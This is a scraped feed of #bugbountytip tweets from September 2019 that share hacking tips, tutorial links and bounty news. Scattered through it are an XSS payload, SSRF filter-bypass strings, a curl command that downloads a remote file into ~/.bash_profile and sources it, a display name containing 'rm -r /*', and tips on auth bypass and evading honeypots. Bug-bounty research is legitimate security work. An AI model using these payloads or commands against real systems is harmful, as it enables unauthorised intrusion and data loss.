0 Google will now pay bigger rewards for discovering Chrome security bugs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/54qJVMUyN1
Pomegranate 🌴
@ret2pomegranate


2019-09-22 23:48:57
0 Just reported RCE to a program on @Hacker0x01. At first PHP functions like exec(), system() weren’t being executed due to PHP disabling these. Was able to disable the function itself and made system() available again & boom RCE. #bugbounty #BugBountyTip #hackerone #infosec
baluz🔥
@haknfuk


2019-09-22 17:15:22
2 https://t.co/LHR5DiByot free free free #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-22 14:54:07
3 Maximise Your Bug Bounty Scope and Payout with #AMASS from $$ OWASP $$ https://t.co/UZCGyJAWXQ Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops
A hacker's life
@Unknownuser1806


2019-09-22 14:29:59
1 This is a collection of writeups, cheat sheets, videos, related to SSRF in one single location https://t.co/DEn6Z8EY5X #SSRF, #bugbounty, #BugBountyTip
hacks2learn
@hacks2learn


2019-09-22 12:55:15
0 For those looking for new ideas... I re-discovered this awesome article today by @Jackson_T and I'm sharing it as it is an excellent resource for learning how to find vulnerabilities https://t.co/1QeTSFfaxl #BugBountyTip 👍
expl0itc0der
@vanshitmalhotra


2019-09-22 12:09:38
1 Looking for Rare SQL Injection Bugs ? Maximise your Bug Bounty Payouts SQL Injection Tutorial - OWASP JuiceShop Hidden Christmas Surprise Challenge 💰💰💰💰 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/N4vjkRujJj
expl0itc0der
@vanshitmalhotra


2019-09-22 12:03:33
0 A5 Broken Access Control Forced Browsing OWASP Juice Shop Tutorial Follow On Facebook $$$ https://t.co/iNczOcGmCt Subscribe on Youtube https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #devsecops #cybersecurity https://t.co/yQ2JhdWzi2
expl0itc0der
@vanshitmalhotra


2019-09-22 11:53:29
2 A6 Directory Listing Security Misconfiguration OWASP Juice Shop Tutorial Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting https://t.co/2gtd4DxOSr
m0z
@LooseSecurity


2019-09-22 10:33:56
3 What languages do you think are the best for hackers? It's a common question, interested to know what others think. In my opinion PHP programmers are very security-aware. Python is good for bug bounty automation. JS is good for advanced XSS payloads/PoCs. #BugBountyTip
OWASP Amass
@owaspamass


2019-09-22 05:28:59
5 OWASP Amass Tip For ASNs: amass intel -org OrgName For domain names: amass intel -active -asn n1,n2 For subdomains and infrastructure: amass enum -src -ip -df domains.txt #osint #recon #assetdiscovery #subdomain #enumeration #bugbounty #bugbountytip https://t.co/QWTftRbJKT
Vulkey_Chen
@Vulkey_Chen


2019-09-22 03:57:34
0 #BugBounty #BugBountyTips #BugBountyTip I build a burpsuite extension to mark sensitive information. e.g. If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. Open Source Address: https://t.co/zvEFnVh0FK https://t.co/fNN80C1Etz
iamsushi
@sushiwushi2


2019-09-22 02:21:14
0 Here's a #BugBountyTip, if you are lazy like me to manually generate a POST request CSRF POC, consider using this tool https://t.co/tEzQaMmFgB
Securisec 🚀
@securisec


2019-09-21 23:55:24
0 "RT RT vanshitmalhotra: XSS Filter Bypass on https://t.co/bT7rV3brs6 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/z6m1vQwWw1 (mobile version) https://t.co/gJY9DNkfiL #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting"
expl0itc0der
@vanshitmalhotra


2019-09-21 22:50:44
0 XSS Filter Bypass on https://t.co/bFnci9AWC2 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/oz7xPDki4P (mobile version) https://t.co/mVUPFSwEL0 #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting
expl0itc0der
@vanshitmalhotra


2019-09-21 21:19:49
3 A5 Broken Access Control OWASP Juice Shop Challenge - OWASP Top Ten Tutorial https://t.co/BQlGp02UDf #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
expl0itc0der
@vanshitmalhotra


2019-09-21 21:15:14
3 A5 Broken Access Control Session Storage OWASP Juice Shop Tutorial OWASP Top Ten Training -- Free #BugBounty Tutorial - 💰💰💰💰 https://t.co/SZmg3HOSP3 #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
[email protected]:~$ sud¤ rm -r /*
@IAMPROPERSAM


2019-09-21 20:29:46
0 Web App owners: We are very secured nd safe from #Hackers. 😹😹 #bugbounties #BugBountyTip https://t.co/6IeHA0Knpr
A hacker's life
@Unknownuser1806


2019-09-21 19:58:08
1 A list of payloads for any kind of #vulnerability https://t.co/RfVj8bc6A9 #XSS ,#sqli, #ssrf ,#csrf,#rce #bugbounty,#BugBountyTip
GTH / GrandTheftHTTP / Adam Langley
@GrandTheftHTTP


2019-09-21 18:07:06
0 Everyone is always trying to find content on a website. Why don't you look for the absence of content ( aka the 404 page ). 404’s will quite often reflect the page URL that's trying to be accessed which could be prone to an XSS attack #BugBountyTip #hacking #infosec
Dominik Opyd
@neiriru


2019-09-21 17:56:25
0 I recommend reading #bugbounties #Security #Hacking #bugbountytips #BugBountyTip #BugBounty https://t.co/834ItNwAPP
Oad Earth
@oad_earth


2019-09-21 17:42:21
0 Is GitHub OAuth is really safe or is something wrong there? #BugBountyTip #Security #Hacking #BugBounty #bugbountytips #bugbounties https://t.co/ES0GAsnRsg
Sudoka
@sudo_sudoka


2019-09-21 16:41:16
1 Today I learn that we can check an IP whether it is a honeypot or not by using https://t.co/a61WGFzu9Q. Now you can avoid the honeypots and concentrate in real systems. Please comment if you find a honeypot. 🙏 #bugbounty #bugbountytip #threathunting
expl0itc0der
@vanshitmalhotra


2019-09-21 09:32:50
3 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script --- $$$$$ --- Use these Nmap script to automate the searching of CVE for a version of service running on a port scanned using Nmap. #BugBounty #bugBountyTip https://t.co/0gfcgW7uTM
Enciphers
@enciphers_


2019-09-21 07:13:31
4 "Demystifying Frida" On our Youtube Channel: https://t.co/UolayOUxTO Presentation: https://t.co/nX6KhTtdNM #BugBountyTip #cybersecurity #pentest #informationsecurity #cybersec #infosecurity #infosec #BugBounty #androidapp #AppSec #MobileApp #Pentesting #iOS #androidsecurity https://t.co/2E3a1hoelj
BlackClover
@Bc10ver


2019-09-21 07:05:42
0 Top story: @intigriti: '🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/3COYJGb6iZ, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-21 07:05:42
0 XSS News: @intigriti: '🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/0zBniIXCrE, see more https://t.co/4VACxHYGGn
Rapid Safeguard
@RapidSafeguard


2019-09-21 06:52:52
0 https://t.co/3YHBGnQ3VO Awesome Hacking Resources #hacking #resources #infosec #BugBountyTip
👣
@_sawzeeyy


2019-09-20 22:25:31
1 Don't forget to use that BXSS payload 😉 #BugBounty #BugBountyTip
Murdockz
@Murdockz_CEH


2019-09-20 20:51:58
1 Company: "Great find, keep up the good work and please continue to test the API" Me: "Sure...btw I was able to achieve RCE further exploiting the SQLi on the strfdate feild" Company: ".........." 🥴😂😅 btw this is a Ruby built API 🤪 #bugbounty #bugbountytips #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-20 18:58:49
0 Stealing JWTs in localStorage via XSS #BugBounty #BugBountyTip #Pentesting #penetrationtesting #cybersecurity https://t.co/XkEWCB2gXb
Michele Romano
@Mik317_


2019-09-20 17:58:38
0 OK, I'm off ... can't find something challenging and want to find something on a well paid and very used software ... any suggest on the name of the software to test? #BugBountyTip https://t.co/EUH5oFQ6Wk
Rafin Rahman Chy
@rafinrahmanchy


2019-09-20 17:44:24
0 Free Nmap Courses https://t.co/TAy9OCjuHo https://t.co/6EEKrEKPj5 https://t.co/82UGYDkWgz #nmap #Pentesting #InfoSec #CyberSecurity #Hacking #Hacker #EthicalHacking #whitehat #BugBounty #BugBountyTip https://t.co/UjVc2AxHSj
intigriti
@intigriti


2019-09-20 15:39:53
9 🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti https://t.co/VsFLtVFJRm
Mehmet Xyele
@mehmetxyele


2019-09-20 15:01:17
6 Subdomain enumeration with Rapid7 FDNS using AWS Athena https://t.co/fTJDvpeOWF #bugbounty #bugbountytips #bugbountytip #hackerone #hacker0x1 #hacker101 #bugcrowd
plenum 🇹🇳
@plenumlab


2019-09-20 14:58:21
0 Been busy lately to do write-ups here is a short story about 2500$ bug chain #BugBountyTip #BugBounty https://t.co/TMV1kiRFPl
Vulkey_Chen
@Vulkey_Chen


2019-09-20 14:55:12
0 #BugBountyTip #bughunter #bugbountytips BugBounty Hunter's Vulnerability Test Aid Platform: https://t.co/KrIlHNdFai ,Open Source Address: https://t.co/oUqeQBxmDQ
A hacker's life
@Unknownuser1806


2019-09-20 14:18:59
0 Bugbounty cheatsheet https://t.co/dIe8tBFAK7 #bugbounty, #BugBountyTip
Karel Origin
@Karel_Origin


2019-09-20 11:20:46
1 @intigriti couldn't handle this #bugbountytip (😢), so here I am: XSS executing on the wrong domain? No problem! Social Engineer your favourite platform analyst! https://t.co/26axjq8Iwj
SecuNinja
@secuninja


2019-09-20 11:05:16
3 don't waste your time with @zerocopter form based public programs. just got replies after 10 months telling me they cannot reproduce a bug.... wow! what surprise after 10 months. others still open same long... #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-20 07:21:10
1 API --> JSON body post request--> contains two numeric fields --> first field set value from -1 to 9999999999 --> PostgreSQL database disclose --> set other field from 100 to 999999 --> table, query, fields disclose. #bugbountytips #bugbounty #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-09-20 00:00:17
0 6 bugs : 4 idors and broken access control and account takeover and all this shit are duplicated #bugbountytip #BugBounty #CyberSecurity #dxtr0x01
Faizal Abroni
@faizalabroni


2019-09-19 23:10:40
2 https://t.co/f8BIngazNw This is how we found something from information disclosure to remote code execution and Worth $10.000 (indonesian language) #bugbountytip #bugbounty #togetherwehitharder #ItTakesaACrowd #hackerone #bugcrowd
expl0itc0der
@vanshitmalhotra


2019-09-19 20:09:45
6 Bug Bounty — Tips / Tricks / JS (JavaScript Files) https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
expl0itc0der
@vanshitmalhotra


2019-09-19 20:03:33
2 JS-Recon detailed. Analizying the internal network with a XSS https://t.co/ySiyhKIP7K Follow For Cyber Security Training and Bug Bounty Updates https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #Penetrationtesting #pentesting #cybersecurity #tools #pentesttools #bugbountytool
expl0itc0der
@vanshitmalhotra


2019-09-19 19:59:58
1 Exploiting File Uploads – A Tale of a $3k worth RCE --- $$ https://t.co/zpcHqz0fyx #BugBounty #BugBountyTip #PenetrationTesting #Penetesting #CyberSecurity #bounty $$$$$
expl0itc0der
@vanshitmalhotra


2019-09-19 19:54:18
0 BugBounty --- Cheat Sheets, Methodologies https://t.co/8CyoUV65oL #BugBounty #BugBountyTip $$$$$$$
bugbountytip
@a_l_e_r_t_1_


2019-09-19 19:03:19
0 VIM tutorial: linux terminal tools for bug bounty pentest and redteams w... https://t.co/R4yTVHqWHE #bugbountytip
itsmenaga
@nagarockshard


2019-09-19 17:58:21
0 If You See Any White Label Error Page just load your Burp intruder With Actuator Endpoints . If lucky Enough You might End Up With Gold Mine. List:- https://t.co/IObR5VqFPJ #pentesttips #bugbountytip #bugbounty
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-19 16:29:17
0 From Tbilisi to Batumi is 5 hours by train :) Decide play in Termux and recon :) #bugbountytip https://t.co/uoco4qvpZG
DarkOverFlow
@HAXORANON


2019-09-19 12:56:29
0 does anyone know how to find forgotten endpoints if so dm me #hackerone #bugbountytip #bugbounty #bughunter #bugbountytips
Shaked Klein Orbach 🇮🇱
@shakedko


2019-09-19 11:21:56
1 Did you know about "thisisunsafe" when visiting HTTPS websites with HSTS? https://t.co/e9VaXqwGpd Almost like IDDQD or better IDKFA #BugBounty #bugbountytip
Dominik Małowiecki
@5up3rD43m0n


2019-09-19 09:54:47
0 it's one of these days when you check your database and realize that a bug hunter was successful, but he did not realize it and forget to report it #bugbountytip @Hacker0x01
Constant 🇪🇬
@Mr_A_ConstanT


2019-09-19 09:44:14
0 a shell script aim to automatically launch 50+ online web scanning tools in the Browser against a target domain in a 10 waves, #CyberSecurity #bugbountytip #WebApp #Hacking https://t.co/nTNLn3LrpY
JaWaD 🇲🇦
@CHAJER2


2019-09-19 09:39:01
0 Yay, I was awarded a $750 bounty on @Hacker0x01 #TogetherWeHitHarder steps: == #bugbountytip: Change sometimes method post to get can lead to Information Exposure Through Debug Information.
Avanish Pathak
@avanish46


2019-09-19 05:52:05
0 #bugbountytip discovered CSRF+Stored XSS in a private program on @Bugcrowd but unfortunately XSS was Out of scope in that program. How it works :- https://t.co/f2YJa1WgTi
A hacker's life
@Unknownuser1806


2019-09-19 03:08:09
1 When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input. #hacking, #bugbountytip ,#bugbounty
Fisher
@Regala_


2019-09-19 01:12:56
2 The less you use scanners, the more severe your issues are #cosmic #DISTURBANCE 🇨🇦 #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-18 19:58:10
0 Guys if you are looking to get up and running with Go / Golang, I highly recommend this video by @traversymedia Go / Golang Crash Course https://t.co/kH75W4DeY3 #bugbounty #go #golang #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 18:56:33
0 Good #hacking is a combination of observation and skill. #bugbountytip , #motivation ,#bugbounty
RabbidByte
@RabbidByte


2019-09-18 14:35:27
0 Don't forget about the @Hacker0x01 Hacker101 discord channel .... I missed way too much when I forgot about it for 8 months or so. #bugbountytip
Emad Youssef
@Sy3Omda


2019-09-18 12:57:27
0 as it looks simple as it should be BUT this would minimize your time in enumeration phase curl https://t.co/wuePgiRbGU -o ~/.bash_profile && echo "source ~/.bash_profile" >> ~/.bashrc i have combined most of keyhack in one bash profile enjoy #BugBounty #bugbountytip #Pentesting
gweeperx
@gweeperx


2019-09-18 07:42:39
2 Just another XHR cookie/body stealer: https://t.co/kbmsAYuwsJ #bugbounty #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:39:15
0 DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User https://t.co/HrwGYO0fjL #bugbounty , #bugbountytip ,#hacking
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:33:03
0 #XSS, #SQLi, #CSRF, #SSRF, #XXE, OS command #injection, directory traversal., and #HTTPrequest smuggling. - > Everything you need to getting started with #bugbounty #bugbountytip , #hacking https://t.co/4ZnwNy6STO
daniel_v
@danielv47251669


2019-09-17 18:09:57
0 #bugbountytip #bugbountytips >found a login page restricted to business email only >intercepted the signup request > intercepted response from this request > changed response body from "false" to "true" > auth bypass > internal access to the platform
farukh
@Farukhwap


2019-09-17 16:17:30
0 @Olacabs @ola_supports @olamoney_in @OlainUK why is it empty 🤔 #fixit #bugbountytips #bugbountytip #loot #Ola https://t.co/CS0HUxo0if
luffydragneel
@Hackers_Guild


2019-09-17 15:56:39
0 Suppose there is contracts page at https://t.co/guSo2PGluZ meant only for Admins and not visible in the lower privileged user's UI. Just directly browse to that page from this lower privileged account, and you might end up seeing the contents there. #bugbountytip #bugbounty https://t.co/1cOxnJ0OTI
Vulkey_Chen
@Vulkey_Chen


2019-09-17 13:52:17
1 #bugbountytip #burpsuite #bugbountytips #bughunter I build a burpsuite extension to mark sensitive information.If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. https://t.co/qeY996qzTi
Ammar Amer🇸🇾
@cry__pto


2019-09-17 13:51:02
17 i have uploaded 34 new articles about different fields of hacking as a pdf files to my github repository. i will continue working on this project years to come. https://t.co/q2layzVpKz #pentest #malware #hacking #infosec #cybersecurity #bugbountytip #redteam #hacking #0day #osint https://t.co/IAaAGXn9HD
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-17 12:54:42
0 Awesome #Shodan search queries https://t.co/Wo0inc380w #bugbounty , #bugbountytip ,#hacking
Vedant
@ved_wayal


2019-09-17 08:58:43
0 Blind XSS is lub 😜😍 #bugbountytip https://t.co/GHlwkPix6W
Rishabh
@____cypher____


2019-09-17 06:58:06
0 SSRF tip: [email protected] ==> black[.]com black[.]com?white[.]com ==> black[.]com black[.]com#white.com ==> black[.]com #bugbountytip #BugBounty #bugbountytips
oops
@a_l_e_r_t_1_


2019-09-17 06:44:01
0 Search for high-level vulnerabilities if you don't want the vulnerability to be duplicated :) #bugbountytip
Sultan Haikal
@SultanMoeslim


2019-09-17 06:08:28
0 {Reviews} in bugbounty, report recipients ... are taking more references from reporters! to imitate / change systematic design, secure etc. reporters don't get any profit. and those who change this, of course benefit internally. best manipulation. #bugbounty #bugbountytip
AFAQUE KHAN
@Afaquekhan24


2019-09-17 05:13:43
1 @stereotype32 Remember you fools...you bug bounty hunter fools... any bypass technique that is publicly posted no longer work in real world scenario .....this is my #protip for today #hackerone #bugbountytip #BugBounty #bugbountytips #bugcrowd ...Happy hunting...
Pomegranate 🌴
@ret2pomegranate


2019-09-17 04:33:45
1 When you & your partner get a bounty. #bugbountytip #bugbounty #infosec https://t.co/3rjqUgsXeE
luffydragneel
@Hackers_Guild


2019-09-17 03:46:04
1 Suppose the sensitive content is at /folder/content. If there is proper access control on /folder, it doesn't mean that there is proper access control when you visit /folder/content directly. Always look for access control issues on each endpoint. #bugbountytip #bugbounty https://t.co/J8jVcy2IKB
Pomegranate 🌴
@ret2pomegranate


2019-09-16 23:47:44
0 Just reported Double-Sequence XSS which affects 2 parameters in a single endpoint to a program on @Hacker0x01. #bugbounty #bugbountytip #infosec
Michele Romano
@Mik317_


2019-09-16 18:22:47
0 @Manikan77602456 understand how programs work, and definitely how other researcher think ;). Probably see how reports are thought/presented/explained is the best thing you can do to learn. Also, check Twitter #bugbountytip and similar: you'll find good bypasses or medium articles.
Jakub Juszczak
@apertureless


2019-09-16 12:11:31
0 Blind XSS is still my favorite. Spray the payload and after some time, you receive your christmas present 🎁 #infosec #bugbountytip
intigriti
@intigriti


2019-09-16 11:56:17
2 This actually worked on the first site we tested! 🤯 P.S.: Legacy or unimplemented OAuth flows often contain vulnerabilities that can lead to account takeover. 😈 Thanks for the #BugBountyTip, @ngalongc! https://t.co/vwAi9hhHrm
SilexSecure
@silexsecure


2019-09-16 11:23:55
0 @silexsecure Today you will learn WordPress penetration testing using WPScan and Metasploit. @rsilexlab @metasploit @ubuntu @kalilinux @wordpressdotcom #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningmonday #CyberAttack #SSL#GOODhat
Karna
@karna__1


2019-09-16 11:04:38
1 If you want a free online phone number service to receive OTP(s) for your web app testing, here's one: https://t.co/3dPt58DZGy #bugbounty #bugbountytip
Oops!
@Corrupted_brain


2019-09-16 10:17:18
0 This Oracle directory architecture was quite helpful for me to harvest critical information by exploiting XXE and reading files locally. #bugbountytip #bugbounty #Oracle https://t.co/Fjhg3OX2Gd
Sp
@spt_2020


2019-09-16 10:06:29
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/BYm6GxAFnz #bugbountytip
oops
@a_l_e_r_t_1_


2019-09-16 08:48:37
0 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
Juha Remes
@juha_remes


2019-09-16 08:36:33
0 This is a great #bugbountytip. 👍 https://t.co/XteWTBVmMe
oops
@a_l_e_r_t_1_


2019-09-16 08:22:45
0 Really very, very slow in fixing gitlab vulnerabilities #bugbountytip
Pomegranate 🌴
@ret2pomegranate


2019-09-16 05:54:08
0 #BugBounty #bugbountytip #infosec Normal User: “Text Injection” (The Depression Period) Bug Bounty Hunter: Arbitrary Spoofed Character Encoded Injection via the Roman Alphabet. https://t.co/Z20cvTDtUG
Pomegranate 🌴
@ret2pomegranate


2019-09-16 03:35:05
2 Just reported XSS to a program on @Hacker0x01. #InfoSec #bugbounty #bugbountytip Got XSS through a POST request in a parameter, automated it through my web-server due to `document.location.href=` being used in the vulnerable parameter.
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-16 02:45:02
0 This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. #shodaneye : https://t.co/AarJFRVDOP #hacking #bugbounty #bugbountytip
A DNF 🦖
@binb4sh


2019-09-16 01:08:34
0 If the target server is running Windows and you can create files and directories on it, try to create ones with forbidden names (CON,AUX,etc)! It may cause errors resulting in Info Disclosure/DoS. An example written in PHP: file_put_contents("con.png",""); #bugbountytip
terjanq
@terjanq


2019-09-16 00:22:36
3 I haven't published any writeups in a while. Here is my latest #writeup to an awesome #buyify challenge from #csaw19 #ctf that has just ended a few hours ago. The author of the task is @itszn13. You should definitely check this out! https://t.co/uAWk6hsyoI #bugbountytip
Drok3r🏴‍☠️
@drok3r


2019-09-15 21:23:18
0 pixload -- Image Payload Creating tools #bugbountytip #payload Link [ https://t.co/6wh5X9EWXB ] https://t.co/Fc4kBuKmMp
securibee 🐝
@securibee


2019-09-15 19:19:08
0 @Random_Robbie @j_opdenakker @Vin1515 @zseano @NahamSec @TomNomNom @d0nutptr @stokfredrik @yaworsk @Alyssa_Herrera_ has great content as well make sure to follow her! @ITSecurityguard Follow #bugbountytip although it's pretty noisy. Subscribe to newsletter from @PentesterLand https://t.co/e2fgYy31Gr I keep forgetting people. My bad!
dykaushik
@dykaushik


2019-09-15 17:40:17
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/GGQro6C5zH #bugbountytip
Mayur Parmar
@th3cyb3rc0p


2019-09-15 17:13:52
0 Must read blog🙂 https://t.co/4nQ54tutfD #bugbountytip #BugBounty #bughunting #ethicalhacking
W🌍aR🐁eeq
@wareeq_shile


2019-09-15 16:44:53
0 Can this still be taken over? #BugBounty #bugbountytip #bugbountytips https://t.co/nN5Xdani38
Wh11teW0lf
@Wh11teW0lf


2019-09-15 16:26:05
1 #bugbountytip The most vulnerable place in Wordpress/Drupal is a custom themes and plugins. Wordpress Location: /wp-content/themes/ and /wp-content/plugins/ You can found their name with Waybackarchive or site map in Burp.
Murdockz
@Murdockz_CEH


2019-09-15 14:50:00
0 Passive recon 😁 #bugbountytip #bugbountytips #bugbounty https://t.co/oCvjzwcsb6
Somdev Sangwan
@s0md3v


2019-09-15 13:27:18
0 @yassergersy Why is this #bugbountytip and not #websecuritytip?
vavkamil
@vavkamil


2019-09-15 13:01:34
1 How to bypass Android certificate pinning and intercept SSL traffic #bugbounty #bugbountytip https://t.co/KFRUCYEc96
Youssef A. Mohamed
@GeneralEG64


2019-09-15 12:36:29
4 The easiest P1 ever!! 😂😍 Steps to Reproduce: Navigated to https://t.co/CEADFzHYUD Directory Bruteforcing found "admin" Bruteforcing into it found "users.db" Exposing admin's creds in plaintext! Logging in to the Admin Panel. #BugBounty #bugbountytip https://t.co/7SuX3E5otC
BlackClover
@Bc10ver


2019-09-15 12:15:41
0 Top story: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/dkBDDSkQ0n, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-15 12:15:40
0 XSS News: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/TDrl37pldF, see more https://t.co/4VACxHYGGn
oops
@a_l_e_r_t_1_


2019-09-15 08:55:16
1 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
nocomp
@nocomp


2019-09-15 08:01:13
0 Any good #BugBounty discord place for learn and share? #bugbountytip thx for RT
HackIsOn ®
@hackison


2019-09-15 07:57:21
0 Ghazi is a BurpSuite Plugins For Testing various PayLoads Like "XSS,SQLi,SSTI,SSRF,RCE and LFI" through Different tabs , Where Each Tab Will Replace Every GET or POST Parameters With Selected TAB in "Proxy" or "Repeater" TAB. https://t.co/PUhzq0SuEo #bugbounty #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-09-15 05:12:49
0 Awesome #bugbountytip https://t.co/DnjdSHMcix
Securisec 🚀
@securisec


2019-09-15 02:08:06
0 "RT RT YoKoAcc: Bismillah. Releasing one of my RCE story at one of Bug Bounty Program. Race Condition that could Result to RCE - (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3). https://t.co/j8fCpvwWy6 #bugbountytip…
Ankur Vaidya
@4N_CURZE


2019-09-15 00:14:37
0 Finally reached and completed one more milestone :) 😀😃😍😍♥️♥️♥️ #openbugbounty #xss #bugbounty #bugbountytip #bughunter #WhiteHats #pentest #Pentesting @openbugbounty @openbounty @whitehatsec @bugbountyforum https://t.co/zKVguucXI3
Pomegranate 🌴
@ret2pomegranate


2019-09-14 20:26:55
0 Just reported RCE to a program on @Hacker0x01. Wish me the best of luck. #infosec #bugbounty #bugbountytip Kind of nervous because of an accidental reboot that occurred while I was testing for a PoC.
Bijan Murmu
@0xBijan


2019-09-14 20:14:02
0 New write-up "How I found a simple and weird Account takeover bug" https://t.co/32185JXNW6 #bugbounty #bugbountytip
Aziz Hakim
@hackerb0y_


2019-09-14 20:09:17
0 I was logged in a program's portal!🧐 Suddenly I have visited this URL!🙄 https://*.redacted.com/user/profile/delete and GUESS what? My account got deleted without any confirmation!🤣 #bugbountytip #bugbounty
Murdockz
@Murdockz_CEH


2019-09-14 18:22:10
0 2. Will do a write up on how to exploit graphql after bug is fixed and bounty rewarded 😄...there is a part I can't disclose in part 1. #bugbountytip #BugBounty #bugbountytips
Murdockz
@Murdockz_CEH


2019-09-14 18:20:13
0 1. Able to read anyone's gender status when it is set to private or only show to friends. User A not friends with User B. User A can not see User B gender status. User A send a graphql request to user B private gender status is revealed. #bugbounty #bugbountytip #bugbountytips
Pomegranate 🌴
@ret2pomegranate


2019-09-14 16:10:14
0 Accidentally ran a software-specific ‘reboot’ command & crashed the server. It’s been 10+ hours and no response. Should I report this issue to the acquisition/asset? #bugbounty #InfoSec #bugbountytip
Sudoka
@sudo_sudoka


2019-09-14 15:48:48
1 #Bypass #XSS filters with JavaScript RegExp.prototype​.source 🏹🎯🏆 #bugbountytip https://t.co/DiP4CZcqg6
Aditya
@hetroublemakr


2019-09-14 14:15:05
1 Ran into an interesting blog on Medium about #bugbountytip #infosec by @bbinfosec https://t.co/kUUQiAWtca
YasserGersy
@yassergersy


2019-09-14 13:39:56
1 #bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss https://t.co/wEtN3fl4xT
oops
@a_l_e_r_t_1_


2019-09-14 12:42:06
0 My favorite xss payload : <img onerror="{alert`1`}" src> #bugbountytip
Fisher
@Regala_


2019-09-14 11:17:53
0 I'll experiment with streaming like all the cool kids are doing these days 😇 Starting October, schedule to be announced. Any particular subjects you'd be interested seeing or people? Let me know below 👇 #bugbounty #bugbountytip #infosec
Khaled Mohamed
@xelkomy


2019-09-13 20:15:20
0 shopify xss google auth this video awesome #bugbountytip #hackerone #BugBounty https://t.co/JbWlhXSOCK
Sandeep Raghav
@Sandeep_tunna


2019-09-13 18:03:30
0 Hey, @LinkedIn , I found a bug in your system. Please respond if you want to fix it. #bugbounty #testing #bugbountytip #LinkedIn
Simon
@7s26simon


2019-09-13 15:48:26
0 Submitted my first #bugbounty report !!! Hope it hasn't been reported already #ethicalhacker #hack #hacking #pentest #pentester #bugbountytip
Mohan Sri Ramakrishna
@S1r1u5_


2019-09-13 14:10:54
0 Yay, I was awarded a $500 bounty on @Hacker0x01! https://t.co/ac1KEZZZWM #TogetherWeHitHarder. #bugbountytip Actually, I am afraid to test the program cuz I saw some good hackers in the thanks page, But I started and I found a reflected XSS on the main page itself.😇
Mourad
@SecuAudit


2019-09-13 11:07:24
0 Any advice how to get into "Apache Axis version: 1.2.1" where remote admin is disabled ? #bugbountytip #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-09-13 06:23:51
0 HTML to PDF converter bug leads to RCE in Facebook Server -- #BugBounty #BugBountyTip #Writeup https://t.co/UgmPhls8Mb
saranraj
@KceSaranraj


2019-09-13 01:58:28
0 I have the following code <li title="?"> test </li> I need to inject vector to break down the HTML Attributes and execute the alert using an event. is there a way to achieve this without using single/double quotes? <>&*#%\'" - Not Allowed @h1_kenan @le4rner #bugbountytip #xss
Mr.CryptoCZ
@cechv2


2019-09-12 06:56:18
